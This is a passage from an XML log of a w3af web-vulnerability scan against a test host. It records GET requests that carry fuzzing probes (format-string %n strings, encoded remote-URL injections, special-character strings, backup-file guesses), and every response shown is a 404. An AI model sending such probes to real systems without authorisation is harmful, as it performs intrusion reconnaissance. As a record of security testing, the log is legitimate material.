                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtp%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="315">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/hTtp%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="557" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtp%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="316">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="318">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/htTps%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/htTps%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="320">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/htTps%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/htTps%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="321">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/fTp%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="556" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fTp%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="323">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/fTp%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fTp%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="326">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="327">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="328">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="329">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="330">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%5E%28%23%24%21%40%23%24%29%28%28%29%29%29%2A%2A%2A%2A%2A%2A HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="332">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/http%3A%2F%2Fwww.w3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A%2F%2Fwww.w3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="333">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/http%3A/www.w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="555" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A//www.w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="335">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/w3af.org HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;///w3af.org&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="336">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%2F%2Fw3af.org HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%2F%2Fw3af.org&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="337">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="338">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="339">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post~ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="340">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
